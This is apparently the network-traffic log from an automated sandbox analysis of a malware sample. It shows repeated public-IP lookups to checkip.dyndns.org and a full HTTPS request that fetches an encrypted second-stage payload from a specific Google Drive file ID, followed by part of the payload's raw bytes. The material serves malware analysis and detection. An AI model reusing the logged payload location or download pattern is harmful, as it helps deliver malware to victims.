Jan 11, 2025 07:24:44.159471035 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50053	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:45.078433037 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:46.205355883 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50055	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:47.171161890 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:48.144056082 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50057	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:49.090821981 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:49.716588974 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50059	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:50.574296951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:51.204070091 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50061	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:52.270922899 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:53.232875109 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50063	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:54.277167082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:54.903897047 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50065	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:56.132576942 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:57.528477907 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50067	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:58.435825109 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:24:59.092860937 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50069	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:24:59.957814932 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:25:01.718718052 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:25:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50071	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:25:02.718065023 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:25:09.606848955 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:25:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	50073	193.122.6.168	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:25:13.015896082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:25:14.402019024 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:25:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	142.250.181.238	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:23:54 UTC	216	OUT	GET /uc?export=download&id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-11 06:23:54 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 06:23:54 GMT Location: https://drive.usercontent.google.com/download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-tJjbM-CejE69DFwRTR07dQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	142.250.185.225	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:23:55 UTC	258	OUT	GET /download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-11 06:23:57 UTC	4940	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgSIIXmWR7_iaIw9vT4x7RdBT2oHPVCBUgYchXWArhRxMCZn5KaMNsJLR3M2f9RTcbTwitZhkRc Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="EfvrItttis189.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 94272 Last-Modified: Sun, 15 Dec 2024 10:15:31 GMT Date: Sat, 11 Jan 2025 06:23:57 GMT Expires: Sat, 11 Jan 2025 06:23:57 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=fmqCJw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-11 06:23:57 UTC	4940	IN	Data Raw: 3b d9 c2 f6 cf be f7 00 d2 76 61 69 e6 ea f6 7f 11 2a 4b 26 1f 45 a0 8c 17 97 d0 c0 c5 a4 fe 90 93 be 39 9c c1 2b dd 40 2d 2e 82 23 c1 06 69 f7 97 2e dd 85 8a b9 07 b9 78 47 00 cf 3b c1 25 ce 3a cc 47 6c b3 ba 2c 10 00 af 39 ee 6d 24 35 89 46 0d 23 d9 20 ea a1 79 62 94 96 83 79 28 b4 ce 33 3c 5e 79 3d e3 0b b3 d6 4b 50 57 3c fb e8 00 11 70 45 8b db b8 73 bc d0 b1 0d ff 11 53 9b 3e 7e 9d 34 bb 5e 47 e3 a1 43 d5 01 25 8f 77 7e 84 ba d6 51 4a 96 1d 5c 1e fb da d8 40 5f 42 13 3e 3e 1f 6a 7a 79 29 a9 72 70 83 cd 3f 2a 7e 64 03 9a 3f d0 45 53 ec 31 23 8f a2 76 4d db 08 68 1a d3 4d b0 27 bd 99 0b 19 d2 5a df 05 c0 bf ee a5 e4 27 b3 f4 7c df ab 48 d0 39 96 be 9f 26 fd 0c 79 ea 92 6f f8 d0 0b 3e 70 0e 1a 22 57 24 50 98 1d c0 ea 1d 05 41 b7 59 cf fe 13 0c 2b 8f fe Data Ascii: ;vaiK&E9+@-.#i.xG;%:Gl,9m$5F# yby(3<^y=KPW<pEsS>~4^GC%w~QJ\@_B>>jzy)rp?~d?ES1#vMhM'Z'\|H9&yo>p"W$PAY+
2025-01-11 06:23:57 UTC	4816	IN	Data Raw: 5b d8 ef 1a c9 2e 18 d5 4c 60 05 c2 55 16 01 77 51 31 6f e2 32 c6 93 41 d2 d7 e9 18 d8 d3 e7 f6 ef ef 82 6c 58 ce 57 2b e4 7f 59 2a eb 52 8f dd 92 80 17 7d 8e f3 b1 40 f7 01 8c 79 3a 41 17 69 ab 38 38 39 98 f1 a5 60 ed 81 0d 10 85 3b d9 cf 07 2a e2 0e db b6 71 23 41 4a 79 da cd f5 e7 7c 3d 0b 78 e4 2a e7 69 c8 ab b1 89 82 bb aa 49 53 3e 91 12 2a 83 bf 22 a5 ce 74 d6 d5 b3 58 41 52 15 fb 08 d5 d3 75 96 c2 d3 99 ea f5 46 0a aa 18 53 a4 3f 88 b3 2f 1e 9b bc 1f 7e 6e 8c e2 d3 ea bb 51 22 64 b6 4f d4 fc fe f9 68 4d 42 aa ec 6b 42 5f f5 37 36 d6 c8 b8 bf f1 57 76 df 72 07 93 f7 8e ab 02 b7 1d c7 8b 2f 2b 90 a8 33 50 23 d6 7e 89 12 73 43 73 5d cf 00 3d 50 ff 6c 5a 74 15 40 7e 08 e3 e1 c1 fb 2f a0 f7 e4 36 47 20 a8 b8 95 8b 67 8a e3 49 9c f3 9c 39 21 b3 96 4e 3f Data Ascii: [.L`UwQ1o2AlXW+YR}@y:Ai889`;q#AJy\|=xiIS>"tXARuFS?/~nQ"dOhMBkB_76Wvr/+3P#~sCs]=PlZt@~/6G gI9!N?
2025-01-11 06:23:57 UTC	1325	IN	Data Raw: 5f 98 aa 18 53 a8 39 8b 6d f2 fd 4d 67 a8 6a 7e bb 19 d4 ed ca bb 61 aa 3e 2d 75 98 0e 59 b3 ff e9 b6 6b df 13 e1 5d f1 3c 20 b8 e8 db e4 9c d3 6a d9 ff 2d f0 17 c5 fb 75 63 76 8b a1 3d 07 9c 3c 7f bc 1a 94 ae 21 d0 67 a9 1c 5e 41 02 08 0f 49 06 00 2c 95 c3 4d 75 b2 42 c5 fa 3c 86 c5 22 11 4c e6 13 79 5f 28 8d 3f 6e 6f a7 f2 4a 3c d9 57 a6 e1 fb 3d c6 55 ee 8f 89 89 2d 65 a7 68 45 be 06 dc 4d d4 9e 4e 74 d6 92 f0 77 e1 07 2b 14 3c 32 f1 ae 49 b1 aa 52 5e a4 86 a0 15 80 4c 27 91 f8 6c 5d df 0a 4f 31 fa 81 4f 84 a8 54 f5 81 5b 22 43 c6 b5 7f 61 d3 3c ba d7 f4 6b b1 78 ac 05 90 78 89 48 bc ab b4 97 a6 58 06 ef ba 81 c8 87 15 32 d8 48 47 e0 07 7b 37 6e cd d3 f7 7e bb bc 4b 11 05 10 f3 52 b4 22 7c 5b a3 80 ae 13 68 e4 35 83 35 58 68 65 be 6e 3c 43 13 7c 57 91 Data Ascii: _S9mMgj~a>-uYk]< j-ucv=<!g^AI,MuB<"Ly_(?noJ<W=U-ehEMNtw+<2IR^L'l]O1OT["Ca<kxxHX2HG{7n~KR"\|[h55Xhen<C\|W
2025-01-11 06:23:57 UTC	1390	IN	Data Raw: bc bf 83 22 58 06 ed 66 f7 d0 f5 33 0f 8c 38 e5 cf 13 7b 4b ad dc d4 dd d1 9c dd 75 57 10 14 ab 23 91 39 7f 34 65 80 84 15 ca da 19 fb 55 67 69 15 1c 63 9c 43 02 76 46 eb 0f f0 20 6b 62 f3 25 b8 f4 fa 9e 85 51 60 31 ce 51 6f d1 a3 12 38 94 69 3b 6c d1 8f 70 be 33 48 cf 28 00 bf 5a 33 5c e9 79 92 ad 89 ce 2a 1e 19 5b 33 73 b8 95 9c 88 a4 10 52 41 7c 73 5b 0e be eb a9 29 8a 57 07 36 81 a0 a7 60 bf a5 bb a7 fb 46 de 66 f2 45 96 84 7a 86 47 ba 9b a8 3b 36 cb 16 99 a3 25 52 66 f5 a2 fd 3f c3 43 c3 0f f4 98 5e f6 94 b7 ca 5d 31 cd 18 07 b7 11 20 52 40 a7 5a 60 72 4c 28 d9 19 57 73 c5 20 90 a0 22 3c f5 e0 38 53 1d 97 2f 15 2b a0 fa 8b c8 d1 72 9d ab 45 c1 ef 4d ac af ea 44 28 c7 69 43 ef 7b 80 7f 71 ed 8c 8c 83 8f cf e3 93 d4 88 eb e6 58 78 1e e9 48 cd b9 77 9c Data Ascii: "Xf38{KuW#94eUgicCvF kb%Q`1Qo8i;lp3H(Z3\y*[3sRA\|s[)W6`FfEzG;6%Rf?C^]1 R@Z`rL(Ws "<8S/+rEMD(iC{qXxHw
2025-01-11 06:23:57 UTC	1390	IN	Data Raw: 33 fd 9e cd 26 84 c6 e4 21 d9 20 fb ad 68 2f 0e 85 8d 68 26 c7 20 33 3c 54 6a 32 f2 05 a2 d8 39 00 4d 3c 8b 87 eb 11 70 4f 9c 0d d7 9c bc d0 bb 1e ef 80 5d e9 6a 6a 82 fe 9d 10 f3 ea 66 71 7c 11 78 5b 25 da ec d3 af 62 28 f5 60 54 9d 9a b7 f2 94 2d 3f 6c 42 5d e5 1f c9 d4 02 dc 1c 51 f9 b7 09 7d 24 45 c1 f2 50 c4 33 6b f0 2e 38 bf b4 67 5e b4 fa 68 1a 89 2e a1 33 e7 09 28 c9 65 60 aa 4a c1 ac f9 b4 f3 34 aa e5 85 f3 af 5f c8 20 c6 95 9a 40 eb 1f 61 e2 83 7c ef 0a 18 24 b8 98 00 1a 61 06 50 98 0c 74 fa 06 94 5e d7 68 d8 cf 07 1d 30 1c e1 68 02 0a 0f 4c 13 63 f5 35 62 c4 d2 21 bb 89 87 38 9a 87 60 f6 78 69 9e e5 c8 12 f6 75 09 b0 09 5c 10 a8 01 a2 0f b4 70 11 a4 a3 9d 7f b1 66 c5 d7 57 e2 81 e0 dc ca 2b 73 b2 8d 3f f0 8a 3d c5 20 f2 20 07 03 9d 2c 9d 6c 72 Data Ascii: 3&! h/h& 3<Tj29M<pO]jjfq\|x[%b(`T-?lB]Q}$EP3k.8g^h.3(e`J4_ @a\|$aPt^h0hLc5b!8`xiu\pfW+s?= ,lr
2025-01-11 06:23:57 UTC	1390	IN	Data Raw: e0 8e 82 a5 2d a1 04 ae 45 92 2d 14 90 8f e7 83 17 d6 e9 a1 87 4f 6d 2b 3b 03 9b fa fa 3d 1b f6 be 63 47 da 5b 3a 30 99 17 70 11 f9 d3 43 50 ac 64 52 64 cf e7 d6 3d 65 14 cc 23 2e 34 f2 b9 29 a5 9a a4 a0 47 0b c8 0d 1b b5 19 99 01 5b eb d3 c3 01 f2 94 0a d5 d1 26 f1 89 24 ee 4f 3f 88 51 cb e3 06 c6 49 f2 dd c2 03 79 40 7e 55 1a 7f 37 20 19 e2 38 e4 a9 3f c0 dd fa 15 e1 51 93 6b e5 ef 5d 73 52 d6 71 43 10 10 58 20 f8 53 9e 0a 5f 9f 23 59 91 ea a0 40 8b fb 8c 51 62 56 78 9c 76 2f 30 56 98 f0 a5 6a bb f3 0d 10 8b 45 8f c4 07 4b fc 49 da b6 71 23 44 b9 69 c4 e5 54 3c 52 37 02 0d f5 2a 94 e4 e4 a6 aa 92 f1 bb ac 37 4c 51 90 16 59 04 bf fe a7 2f 93 cd 0f ae 82 47 82 f7 2d 08 d5 d8 18 b0 ca c8 8c 82 73 4e 84 c9 03 98 8a 71 19 b3 25 14 e9 dd 13 6a 08 8c 33 d3 ea Data Ascii: -E-Om+;=cG[:0pCPdRd=e#.4)G[&$O?QIy@~U7 8?Qk]sRqCX S_#Y@QbVxv/0VjEKIq#DiT<R7*7LQY/G-sNq%j3
